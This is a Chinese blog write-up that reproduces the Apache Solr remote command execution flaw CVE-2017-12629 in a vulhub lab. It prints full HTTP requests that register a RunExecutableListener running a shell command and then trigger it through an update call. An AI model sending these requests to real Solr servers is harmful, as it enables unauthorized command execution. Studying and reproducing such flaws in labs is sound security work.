Apache Solr 远程命令执行漏洞（CVE-2017-12629）复现

Apache Solr 远程命令执行漏洞（CVE-2017-12629）复现

1、漏洞简述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过 Http 利用 XML 加到一个搜索集合中。查询该集合也是通过 http 收到一个 XML/JSON 响应来实现。此次 7.1.0 之前版本总共爆出两个漏洞：XML 实体扩展漏洞（XXE）和远程命令执行漏洞（RCE），二者可以连接成利用链，编号均为 CVE-2017-12629。

影响范围

Apache Solr < 7.1

Apache Lucene < 7.1（很多组件都用到这个，比如ES）

2、环境搭建

使用vulhub搭建靶场环境

cd vulhub-master/solr/CVE-2017-12629-RCE/
docker-compose up -d

这个环境启动起来比较慢。

访问http://ip:8983

3、漏洞复现

使用火狐打开http://ip:8983，并且通过插件wappalyzer查看网站的基本信息

使用burp抓包，首先创建一个listener，其中设置exe的值为我们想执行的命令，args的值是命令参数：

POST  /solr/demo/config HTTP/1.1
Host: 192.168.199.51:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 158


{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/succ123"]}}

然后进行 update 操作，触发刚才添加的 listener：

POST  /solr/demo/update HTTP/1.1
Host: 192.168.199.51:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 15


[{"id":"test"}]

打开docker查看一下创建的文件

docker ps
docker exec -it ed47e5a799b0 /bin/bash
ls /tmp

同样的方法，再试试其他命令，ping  dnslog

成功

声明：

本文仅限于大家技术交流和学习，严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失，后果由您自行承担，感谢您的配合，

作者创作不容易，请大家点赞收藏支持一下。谢谢各位读者大老爷。